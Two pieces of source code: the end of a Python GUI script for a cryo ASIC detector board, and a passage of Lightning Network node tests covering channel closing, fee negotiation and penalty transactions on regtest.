    """
    def __init__(self, guiTop, cmd, dataWriter, srp, **kwargs):
        super().__init__(name='cryoAsicGen1',description='cryo ASIC', **kwargs)
        self.add(dataWriter)
        self.guiTop = guiTop
        self.cmd = cmd

        # Software trigger: sends opcode 0 on the command stream (VC0).
        @self.command()
        def Trigger():
            self.cmd.sendCmd(0, 0)

        # Add Devices
        if ( args.type == 'kcu1500' ):
            # Register access to the PCIe core goes through its own memory map.
            coreMap = rogue.hardware.axi.AxiMemMap('/dev/datadev_0')
            self.add(XilinxKcu1500Pgp3(memBase=coreMap))
        self.add(fpga.EpixHRGen1Cryo(name='EpixHRGen1Cryo', offset=0, memBase=srp, hidden=False, enabled=True))
        self.add(pyrogue.RunControl(name = 'runControl', description='Run Controller hr', cmd=self.Trigger, rates={1:'1 Hz', 2:'2 Hz', 4:'4 Hz', 8:'8 Hz', 10:'10 Hz', 30:'30 Hz', 60:'60 Hz', 120:'120 Hz'}))
# Optional verbose taps: attach a debug slave to each data lane so frames are
# hex-dumped to the console. Note each tap rebinds `dbgData`, so only the last
# created slave remains referenced by name (the taps keep their own refs).
if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 0[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL0Vc0, dbgData)

if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 1[{}]".format(0))
# if (args.verbose): pyrogue.streamTap(pgpL1Vc0, dbgData)

if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 2[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL2Vc0, dbgData)

if (args.verbose): dbgData = rogue.interfaces.stream.Slave()
if (args.verbose): dbgData.setDebug(60, "DATA Verbose 3[{}]".format(0))
if (args.verbose): pyrogue.streamTap(pgpL3Vc0, dbgData)

# Create GUI
appTop = QApplication(sys.argv)
guiTop = pyrogue.gui.GuiTop(group='cryoAsicGui')
cryoAsicBoard = Board(guiTop, cmd, dataWriter, srp)
# Polling is disabled when there is no live hardware to poll.
if ( args.type == 'dataFile' or args.type == 'SIM'):
    cryoAsicBoard.start(pollEn=False, pyroGroup=None)
else:
    cryoAsicBoard.start(pollEn=True, pyroGroup=None)
guiTop.addTree(cryoAsicBoard)
guiTop.resize(800,800)

# Viewer gui
if START_VIEWER:
    onlineViewer = vi.Window(cameraType='cryo64xN')
    onlineViewer.eventReader.frameIndex = 0
    onlineViewer.setReadDelay(0)
    pyrogue.streamTap(pgpL0Vc0, onlineViewer.eventReader)
    if ( args.type != 'dataFile' ):
        pyrogue.streamTap(pgpL0Vc2, onlineViewer.eventReaderScope)# PseudoScope
    #pyrogue.streamTap(pgpL0Vc3, onlineViewer.eventReaderMonitoring) # Slow Monitoring

# Run the Qt event loop; blocks until the GUI is closed.
if (args.start_gui):
    appTop.exec_()

# Close window and stop polling
cryoAsicBoard.stop()
exit()
|
test_closing.py | from fixtures import * # noqa: F401,F403
from flaky import flaky
from pyln.client import RpcError, Millisatoshi
from shutil import copyfile
from pyln.testing.utils import SLOW_MACHINE
from utils import (
only_one, sync_blockheight, wait_for, TIMEOUT,
account_balance, first_channel_id, closing_fee, TEST_NETWORK,
scriptpubkey_addr, calc_lease_fee, EXPERIMENTAL_FEATURES,
check_utxos_channel, anchor_expected, check_coin_moves,
check_balance_snaps, mine_funding_to_announce
)
import os
import queue
import pytest
import re
import subprocess
import threading
import unittest
@pytest.mark.developer("Too slow without --dev-bitcoind-poll")
def test_closing_simple(node_factory, bitcoind, chainparams):
    """Mutual-close happy path: billboard statuses, fund recovery, coin moves."""
    # coin_movements plugin records balance changes for the account_balance /
    # check_utxos_channel assertions at the end.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    l1, l2 = node_factory.line_graph(2, opts={'plugin': coin_mvt_plugin})
    chan = l1.get_channel_scid(l2)
    channel_id = first_channel_id(l1, l2)
    # Expected mutual-close fee; elements uses a different hard-coded value.
    fee = closing_fee(3750, 2) if not chainparams['elements'] else 4263

    l1.pay(l2, 200000000)

    assert bitcoind.rpc.getmempoolinfo()['size'] == 0

    billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
    assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']
    billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
    assert billboard == ['CHANNELD_NORMAL:Funding transaction locked.']

    bitcoind.generate_block(5)

    wait_for(lambda: len(l1.getactivechannels()) == 2)
    wait_for(lambda: len(l2.getactivechannels()) == 2)
    billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
    # This may either be from a local_update or an announce, so just
    # check for the substring
    assert 'CHANNELD_NORMAL:Funding transaction locked.' in billboard[0]

    l1.rpc.close(chan)

    l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')
    l2.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')

    l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')

    # And should put closing into mempool.
    l1.daemon.wait_for_log('sendrawtx exit 0')
    l2.daemon.wait_for_log('sendrawtx exit 0')

    # Both nodes should have disabled the channel in their view
    wait_for(lambda: len(l1.getactivechannels()) == 0)
    wait_for(lambda: len(l2.getactivechannels()) == 0)

    assert bitcoind.rpc.getmempoolinfo()['size'] == 1

    # Now grab the close transaction
    closetxid = only_one(bitcoind.rpc.getrawmempool(False))

    billboard = only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
    assert billboard == [
        'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
    ]
    bitcoind.generate_block(1)

    l1.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)
    l2.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid %s.* CONFIRMED' % closetxid)

    # Make sure both nodes have grabbed their close tx funds
    assert closetxid in set([o['txid'] for o in l1.rpc.listfunds()['outputs']])
    assert closetxid in set([o['txid'] for o in l2.rpc.listfunds()['outputs']])

    wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
        'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
        'ONCHAIN:Tracking mutual close transaction',
        'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'
    ])

    # 9 more confirmations: the "waiting N more blocks" countdown moves 99 -> 90.
    bitcoind.generate_block(9)
    wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status'] == [
        'CLOSINGD_SIGEXCHANGE:We agreed on a closing fee of {} satoshi for tx:{}'.format(fee, closetxid),
        'ONCHAIN:Tracking mutual close transaction',
        'ONCHAIN:All outputs resolved: waiting 90 more blocks before forgetting channel'
    ])

    # Make sure both have forgotten about it
    bitcoind.generate_block(90)
    wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
    wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)

    # The entry in the channels table should still be there
    assert l1.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1
    assert l2.db_query("SELECT count(*) as c FROM channels;")[0]['c'] == 1

    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0

    # Expected coin-movement graphs (see check_utxos_channel for the format).
    expected_1 = {
        '0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
        'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
        'B': [('wallet', ['deposit'], None, None), ('external', ['to_them'], None, None)],
    }
    expected_2 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('wallet', ['deposit'], None, None), ('external', ['to_them'], None, None)],
    }

    tags = check_utxos_channel(l1, [channel_id], expected_1)
    check_utxos_channel(l2, [channel_id], expected_2, tags)
def test_closing_while_disconnected(node_factory, bitcoind, executor):
    """A close issued while the peer is down completes once it reconnects."""
    l1, l2 = node_factory.line_graph(2, opts={'may_reconnect': True})
    chan = l1.get_channel_scid(l2)

    l1.pay(l2, 200000000)
    l2.stop()

    # The close should still be triggered afterwards.
    fut = executor.submit(l1.rpc.close, chan, 0)
    l1.daemon.wait_for_log(' to CHANNELD_SHUTTING_DOWN')

    l2.start()
    fut.result(TIMEOUT)

    l1.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')
    l2.daemon.wait_for_log(' to CLOSINGD_SIGEXCHANGE')

    # And should put closing into mempool.
    l1.daemon.wait_for_log('sendrawtx exit 0')
    l2.daemon.wait_for_log('sendrawtx exit 0')

    # 100-block maturity plus one: both nodes forget the channel.
    bitcoind.generate_block(101)
    wait_for(lambda: len(l1.rpc.listchannels()['channels']) == 0)
    wait_for(lambda: len(l2.rpc.listchannels()['channels']) == 0)
def test_closing_disconnected_notify(node_factory, bitcoind, executor):
    """CLI `close` on an offline peer prints '#' progress notes, then force-closes."""
    l1, l2 = node_factory.line_graph(2)

    l1.pay(l2, 200000000)
    l2.stop()
    wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
    # Drive the real CLI binary (not the RPC wrapper) so we can see the
    # human-readable notifications; '5' is the timeout before unilateral close.
    out = subprocess.check_output(['cli/lightning-cli',
                                   '--network={}'.format(TEST_NETWORK),
                                   '--lightning-dir={}'
                                   .format(l1.daemon.lightning_dir),
                                   'close',
                                   l2.info['id'],
                                   '5']).decode('utf-8').splitlines()
    # Notification lines are prefixed with '#'; the JSON result follows.
    assert out[0] == '# peer is offline, will negotiate once they reconnect (5 seconds before unilateral close).'
    assert out[1] == '# Timed out, forcing close.'
    assert not any([line.startswith('#') for line in out[2:]])
def test_closing_id(node_factory):
    """Test closing using peer ID and full channel ID
    """
    l1, l2 = node_factory.get_nodes(2)

    # Close by full channel ID.
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fundchannel(l2, 10**6)
    cid = l2.rpc.listpeers()['peers'][0]['channels'][0]['channel_id']
    l2.rpc.close(cid)
    # Both sides drop the connection once the close completes.
    wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
    wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])

    # Close by peer ID.
    l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
    l1.daemon.wait_for_log("Handed peer, entering loop")
    l2.fundchannel(l1, 10**6)
    pid = l1.info['id']
    l2.rpc.close(pid)
    wait_for(lambda: not only_one(l1.rpc.listpeers(l2.info['id'])['peers'])['connected'])
    wait_for(lambda: not only_one(l2.rpc.listpeers(l1.info['id'])['peers'])['connected'])
@unittest.skipIf(TEST_NETWORK != 'regtest', 'FIXME: broken under elements')
@pytest.mark.slow_test
def test_closing_different_fees(node_factory, bitcoind, executor):
    """Nodes with differing feerate configs still reach mutual closes.

    Opens a channel from l1 to four peers (two feerate configurations, each
    with and without an incoming payment), closes them all concurrently, and
    checks every close transaction reaches the mempool and confirms.
    """
    l1 = node_factory.get_node()

    # Default feerate = 15000/11000/7500/1000
    # It will start at the second number, accepting anything above the first.
    feerates = [[20000, 11000, 15000, 7400], [8000, 6000, 1001, 100]]
    balance = [False, True]
    num_peers = len(feerates) * len(balance)

    addr = l1.rpc.newaddr()['bech32']
    bitcoind.rpc.sendtoaddress(addr, 1)
    numfunds = len(l1.rpc.listfunds()['outputs'])
    bitcoind.generate_block(1)
    wait_for(lambda: len(l1.rpc.listfunds()['outputs']) > numfunds)

    # Create them in a batch, for speed!
    peers = []
    for feerate in feerates:
        for b in balance:
            p = node_factory.get_node(feerates=feerate)
            p.feerate = feerate
            # BUG FIX: record this peer's own flag, not the whole `balance`
            # list — a non-empty list is always truthy, so every peer would
            # have received a payment below instead of only half of them.
            p.balance = b
            l1.rpc.connect(p.info['id'], 'localhost', p.port)
            peers.append(p)

    for p in peers:
        p.channel = l1.rpc.fundchannel(p.info['id'], 10**6, minconf=0)['channel_id']
        # Technically, this is async to fundchannel returning.
        l1.daemon.wait_for_log('sendrawtx exit 0')

    mine_funding_to_announce(bitcoind, peers, num_blocks=6)

    # Now wait for them all to hit normal state, do payments
    l1.daemon.wait_for_logs(['update for channel .* now ACTIVE'] * num_peers
                            + ['to CHANNELD_NORMAL'] * num_peers)
    for p in peers:
        if p.balance:
            l1.pay(p, 100000000)

    # Now close all channels (not unilaterally!)
    closes = [executor.submit(l1.rpc.close, p.channel, 0) for p in peers]

    for c in closes:
        c.result(90)

    # close does *not* wait for the sendrawtransaction, so do that!
    # Note that since they disagree on the ideal fee, they may conflict
    # (first one in will win), so we cannot look at logs, we need to
    # wait for mempool.
    wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == num_peers)

    bitcoind.generate_block(1)
    for p in peers:
        p.daemon.wait_for_log(' to ONCHAIN')
        wait_for(lambda: 'ONCHAIN:Tracking mutual close transaction' in only_one(p.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'])

    l1.daemon.wait_for_logs([' to ONCHAIN'] * num_peers)
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_negotiation_reconnect(node_factory, bitcoind):
    """Fee negotiation survives disconnects around WIRE_CLOSING_SIGNED."""
    # '-'/'+' prefixes drop the connection just before/after sending the message.
    disconnects = ['-WIRE_CLOSING_SIGNED',
                   '+WIRE_CLOSING_SIGNED']
    l1, l2 = node_factory.line_graph(2, opts=[{'disconnect': disconnects,
                                               'may_reconnect': True},
                                              {'may_reconnect': True}])
    l1.pay(l2, 200000000)

    assert bitcoind.rpc.getmempoolinfo()['size'] == 0

    l1.rpc.close(l2.info['id'])
    l1.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')
    l2.daemon.wait_for_log(r'State changed from CHANNELD_NORMAL to CHANNELD_SHUTTING_DOWN')

    # Now verify that the closing tx is in the mempool.
    bitcoind.generate_block(6, wait_for_mempool=1)
    sync_blockheight(bitcoind, [l1, l2])
    for n in [l1, l2]:
        # Ensure we actually got a mutual close.
        n.daemon.wait_for_log(r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by MUTUAL_CLOSE')
@pytest.mark.developer("needs DEVELOPER=1")
def test_closing_specified_destination(node_factory, bitcoind, chainparams):
    """`close` pays the closer's output to an explicitly given destination address."""
    l1, l2, l3, l4 = node_factory.get_nodes(4)

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.rpc.connect(l3.info['id'], 'localhost', l3.port)
    l1.rpc.connect(l4.info['id'], 'localhost', l4.port)

    chan12, _ = l1.fundchannel(l2, 10**6)
    chan13, _ = l1.fundchannel(l3, 10**6)
    chan14, _ = l1.fundchannel(l4, 10**6)

    l1.pay(l2, 100000000)
    l1.pay(l3, 100000000)
    l1.pay(l4, 100000000)

    mine_funding_to_announce(bitcoind, [l1, l2, l3, l4])

    addr = chainparams['example_addr']
    # Exercise all three ways of passing the destination argument:
    # positional, keyword-object, and positional-array JSON-RPC forms.
    l1.rpc.close(chan12, None, addr)
    l1.rpc.call('close', {'id': chan13, 'destination': addr})
    l1.rpc.call('close', [chan14, None, addr])

    l1.daemon.wait_for_logs([' to CLOSINGD_SIGEXCHANGE'] * 3)

    # Both nodes should have disabled the channel in their view
    wait_for(lambda: len(l1.getactivechannels()) == 0)

    wait_for(lambda: bitcoind.rpc.getmempoolinfo()['size'] == 3)

    # Now grab the close transaction
    closetxs = {}
    for i, n in enumerate([l2, l3, l4]):
        billboard = only_one(l1.rpc.listpeers(n.info['id'])['peers'][0]['channels'])['status'][0]
        m = re.search(r'CLOSINGD_SIGEXCHANGE.* tx:([a-f0-9]{64})', billboard)
        closetxs[n] = m.group(1)

    bitcoind.generate_block(1)
    sync_blockheight(bitcoind, [l1, l2, l3, l4])

    # l1 can't spent the output to addr.
    for txid in closetxs.values():
        assert not l1.daemon.is_in_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))

    # Check the txid has at least 1 confirmation
    for n, txid in closetxs.items():
        n.daemon.wait_for_log(r'Owning output.* \(SEGWIT\).* txid {}.* CONFIRMED'.format(txid))

    for n in [l2, l3, l4]:
        # Make sure both nodes have grabbed their close tx funds
        closetx = closetxs[n]
        outputs = n.rpc.listfunds()['outputs']
        assert closetx in set([o['txid'] for o in outputs])

        # The close tx has two outputs: the peer's own (output_num2) and the
        # one that should have gone to `addr` (output_num1).
        output_num2 = [o for o in outputs if o['txid'] == closetx][0]['output']
        output_num1 = 0 if output_num2 == 1 else 1
        # Check the another address is addr
        assert addr == scriptpubkey_addr(bitcoind.rpc.gettxout(closetx, output_num1)['scriptPubKey'])
        assert 1 == bitcoind.rpc.gettxout(closetx, output_num1)['confirmations']
def closing_negotiation_step(node_factory, bitcoind, chainparams, opts):
    """Shared scenario for the fee_negotiation_step tests.

    Opens a channel between two nodes whose feerates imply initial closing-fee
    proposals of 21000 (opener) and 20000 (peer), closes it with the given
    `opts['fee_negotiation_step']` from the side named by
    `opts['close_initiated_by']`, and asserts both billboards and the actual
    mempool fee equal `opts['expected_close_fee']`.
    """
    def feerate_for(target, minimum=0, maximum=10000000):
        """Binary search to find feerate"""
        assert minimum != maximum
        mid = (minimum + maximum) // 2
        mid_fee = closing_fee(mid, 1)
        if mid_fee > target:
            return feerate_for(target, minimum, mid)
        elif mid_fee < target:
            return feerate_for(target, mid, maximum)
        else:
            return mid

    orate = feerate_for(21000)  # closing fee negotiation starts at 21000
    prate = feerate_for(20000)  # closing fee negotiation starts at 20000
    opener, peer = node_factory.line_graph(2, opts=[{'feerates': (orate, orate, orate, orate)},
                                                    {'feerates': (prate, prate, prate, prate)}])

    opener_id = opener.info['id']
    peer_id = peer.info['id']

    assert bitcoind.rpc.getmempoolinfo()['size'] == 0

    if opts['close_initiated_by'] == 'opener':
        opener.rpc.close(peer_id=peer_id, fee_negotiation_step=opts['fee_negotiation_step'])
    else:
        assert opts['close_initiated_by'] == 'peer'
        peer.rpc.close(peer_id=opener_id, fee_negotiation_step=opts['fee_negotiation_step'])

    # Get the proclaimed closing fee from the two nodes' statuses

    status_agreed_regex = re.compile("agreed on a closing fee of ([0-9]+) satoshi")

    # [fee_from_opener_status, fee_from_peer_status]
    fees_from_status = [None, None]

    def get_fee_from_status(node, peer_id, i):
        # Polled by wait_for: returns False until the billboard shows the fee.
        nonlocal fees_from_status
        peer = only_one(node.rpc.listpeers(peer_id)['peers'])
        channel = only_one(peer['channels'])
        status = channel['status'][0]

        m = status_agreed_regex.search(status)
        if not m:
            return False
        fees_from_status[i] = int(m.group(1))
        return True

    wait_for(lambda: get_fee_from_status(opener, peer_id, 0))
    wait_for(lambda: get_fee_from_status(peer, opener_id, 1))

    assert opts['expected_close_fee'] == fees_from_status[0]
    assert opts['expected_close_fee'] == fees_from_status[1]

    # Get the closing transaction from the bitcoind mempool and get its fee

    mempool = None
    mempool_tx_ids = None

    def get_mempool_when_size_1():
        nonlocal mempool, mempool_tx_ids
        mempool = bitcoind.rpc.getrawmempool(True)
        mempool_tx_ids = list(mempool.keys())
        return len(mempool_tx_ids) == 1

    wait_for(get_mempool_when_size_1)

    close_tx_id = mempool_tx_ids[0]
    # v22.99.0-8fe6f5a6fbcd at least doesn't have 'fee', it has 'fees'.
    if 'fees' in mempool[close_tx_id]:
        fee_mempool = round(mempool[close_tx_id]['fees']['base'] * 10**8)
    else:
        fee_mempool = round(mempool[close_tx_id]['fee'] * 10**8)

    assert opts['expected_close_fee'] == fee_mempool
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_30pct(node_factory, bitcoind, chainparams):
    """Test that the closing fee negotiation step works, 30%"""
    # Run the shared scenario once for each side initiating the close.
    for initiator, expected_fee in (('opener', 20537), ('peer', 20233)):
        opts = {
            'fee_negotiation_step': '30%',
            'close_initiated_by': initiator,
            'expected_close_fee': expected_fee,
        }
        closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_100pct(node_factory, bitcoind, chainparams):
    """Test that the closing fee negotiation step works, 100%"""
    # The close fee of 20499 looks strange in this case - one would expect
    # to have a number close to 21000. This is because
    # * the range is initially set to [20000 (peer), 21000 (opener)]
    # * the opener is always first to propose, he uses 50% step, so he proposes 20500
    # * the range is narrowed to [20001, 20499] and the peer proposes 20499
    for initiator, expected_fee in (('opener', 20001), ('peer', 20499)):
        opts = {
            'fee_negotiation_step': '100%',
            'close_initiated_by': initiator,
            'expected_close_fee': expected_fee,
        }
        closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_1sat(node_factory, bitcoind, chainparams):
    """Test that the closing fee negotiation step works, 1sat"""
    # Run the shared scenario once for each side initiating the close.
    for initiator, expected_fee in (('opener', 20989), ('peer', 20010)):
        opts = {
            'fee_negotiation_step': '1',
            'close_initiated_by': initiator,
            'expected_close_fee': expected_fee,
        }
        closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@unittest.skipIf(EXPERIMENTAL_FEATURES, "anchors uses quick-close, not negotiation")
@unittest.skipIf(TEST_NETWORK == 'liquid-regtest', "Different closing fees")
def test_closing_negotiation_step_700sat(node_factory, bitcoind, chainparams):
    """Test that the closing fee negotiation step works, 700sat"""
    # Run the shared scenario once for each side initiating the close.
    for initiator, expected_fee in (('opener', 20151), ('peer', 20499)):
        opts = {
            'fee_negotiation_step': '700',
            'close_initiated_by': initiator,
            'expected_close_fee': expected_fee,
        }
        closing_negotiation_step(node_factory, bitcoind, chainparams, opts)
@pytest.mark.developer("needs dev-disable-commit-after")
def test_penalty_inhtlc(node_factory, bitcoind, executor, chainparams):
    """Test penalty transaction with an incoming HTLC"""
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # We suppress each one after first commit; HTLC gets added not fulfilled.
    # Feerates identical so we don't get gratuitous commit to update them
    l1, l2 = node_factory.line_graph(2, opts=[{'dev-disable-commit-after': 1,
                                               'may_fail': True,
                                               'feerates': (7500, 7500, 7500, 7500),
                                               'allow_broken_log': True,
                                               'plugin': coin_mvt_plugin},
                                              {'dev-disable-commit-after': 1,
                                               'plugin': coin_mvt_plugin}])
    channel_id = first_channel_id(l1, l2)

    # Now, this will get stuck due to l1 commit being disabled..
    t = executor.submit(l1.pay, l2, 100000000)

    assert len(l1.getactivechannels()) == 2
    assert len(l2.getactivechannels()) == 2

    # They should both have commitments blocked now.
    l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
    l2.daemon.wait_for_log('dev-disable-commit-after: disabling')

    # Make sure l1 got l2's commitment to the HTLC, and sent to master.
    l1.daemon.wait_for_log('got commitsig')

    # Take our snapshot: a signed copy of the now-current (soon revoked) tx.
    tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']

    # Let them continue
    l1.rpc.dev_reenable_commit(l2.info['id'])
    l2.rpc.dev_reenable_commit(l1.info['id'])

    # Should fulfill.
    l1.daemon.wait_for_log('peer_in WIRE_UPDATE_FULFILL_HTLC')
    l1.daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')

    l2.daemon.wait_for_log('peer_out WIRE_UPDATE_FULFILL_HTLC')
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # Payment should now complete.
    t.result(timeout=10)

    # Now we really mess things up! Broadcast the revoked commitment: l2 must
    # detect the cheat and sweep everything via penalty transactions.
    bitcoind.rpc.sendrawtransaction(tx)
    bitcoind.generate_block(1)

    l2.daemon.wait_for_log(' to ONCHAIN')
    # FIXME: l1 should try to stumble along!
    wait_for(lambda: len(l2.getactivechannels()) == 0)

    # l2 should spend all of the outputs (except to-us).
    # Could happen in any order, depending on commitment tx.
    needle = l2.daemon.logsearch_start
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')

    l2.daemon.logsearch_start = needle
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/THEIR_HTLC')

    # FIXME: test HTLC tx race!

    # 100 blocks later, all resolved and the channel is forgotten.
    bitcoind.generate_block(100)

    sync_blockheight(bitcoind, [l1, l2])
    wait_for(lambda: len(l2.rpc.listpeers()['peers']) == 0)

    # Do one last pass over the logs to extract the reactions l2 sent
    l2.daemon.logsearch_start = needle
    needles = [
        # The first needle will match, but since we don't have a direct output
        # for l2 it won't result in an output, hence the comment:
        # r'Resolved FUNDING_TRANSACTION/FUNDING_OUTPUT by THEIR_REVOKED_UNILATERAL .([a-f0-9]{64}).',
        r'Resolved THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
        r'Resolved THEIR_REVOKED_UNILATERAL/THEIR_HTLC by our proposal OUR_PENALTY_TX .([a-f0-9]{64}).',
    ]
    matches = list(map(l2.daemon.is_in_log, needles))

    # Now extract the txids for these responses
    txids = set([re.search(r'\(([0-9a-f]{64})\)', m).group(1) for m in matches])

    # We should have one confirmed output for each of the above reactions in
    # the list of funds we own.
    outputs = l2.rpc.listfunds()['outputs']
    assert [o['status'] for o in outputs] == ['confirmed'] * 2
    assert set([o['txid'] for o in outputs]) == txids

    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0

    # l1 loses all of their channel balance to the peer, as penalties
    expected_1 = {
        '0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
        'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
        'B': [('external', ['penalty'], None, None), ('external', ['penalty'], None, None)],
    }

    # l2 sweeps all of l1's closing outputs
    expected_2 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('cid1', ['penalty'], ['to_wallet'], 'C'), ('cid1', ['penalty'], ['to_wallet'], 'D')],
        'C': [('wallet', ['deposit'], None, None)],
        'D': [('wallet', ['deposit'], None, None)]
    }

    if anchor_expected():
        expected_1['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_1['B'].append(('wallet', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))

    # We use a subset of tags in expected_2 that are used in expected_1
    tags = check_utxos_channel(l1, [channel_id], expected_1)
    check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs dev-disable-commit-after")
def test_penalty_outhtlc(node_factory, bitcoind, executor, chainparams):
    """Test penalty transaction with an outgoing HTLC"""
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # First we need to get funds to l2, so suppress after second.
    # Feerates identical so we don't get gratuitous commit to update them
    l1, l2 = node_factory.line_graph(2,
                                     opts=[{'dev-disable-commit-after': 3,
                                            'may_fail': True,
                                            'feerates': (7500, 7500, 7500, 7500),
                                            'allow_broken_log': True,
                                            'plugin': coin_mvt_plugin},
                                           {'dev-disable-commit-after': 3,
                                            'plugin': coin_mvt_plugin}])
    channel_id = first_channel_id(l1, l2)

    # Move some across to l2.
    l1.pay(l2, 200000000)

    assert not l1.daemon.is_in_log('dev-disable-commit-after: disabling')
    assert not l2.daemon.is_in_log('dev-disable-commit-after: disabling')

    # Now, this will get stuck due to l1 commit being disabled..
    t = executor.submit(l2.pay, l1, 100000000)

    # Make sure we get signature from them.
    l1.daemon.wait_for_log('peer_in WIRE_UPDATE_ADD_HTLC')
    l1.daemon.wait_for_log('peer_in WIRE_COMMITMENT_SIGNED')

    # They should both have commitments blocked now.
    l1.daemon.wait_for_log('dev-disable-commit-after: disabling')
    l2.daemon.wait_for_log('dev-disable-commit-after: disabling')

    # Make sure both sides got revoke_and_ack for that commitment.
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
    l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # Take our snapshot: a signed copy of the now-current (soon revoked) tx.
    tx = l1.rpc.dev_sign_last_tx(l2.info['id'])['tx']

    # Let them continue
    l1.rpc.dev_reenable_commit(l2.info['id'])
    l2.rpc.dev_reenable_commit(l1.info['id'])

    # Thread should complete.
    t.result(timeout=10)

    # Make sure both sides got revoke_and_ack for final.
    l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
    l2.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')

    # Now we really mess things up! Broadcast the revoked commitment: l2 must
    # detect the cheat and sweep everything via penalty transactions.
    bitcoind.rpc.sendrawtransaction(tx)
    bitcoind.generate_block(1)

    l2.daemon.wait_for_log(' to ONCHAIN')
    # FIXME: l1 should try to stumble along!

    # l2 should spend all of the outputs (except to-us).
    # Could happen in any order, depending on commitment tx.
    needle = l2.daemon.logsearch_start
    l2.wait_for_onchaind_broadcast('OUR_PENALTY_TX',
                                   'THEIR_REVOKED_UNILATERAL/DELAYED_CHEAT_OUTPUT_TO_THEM')

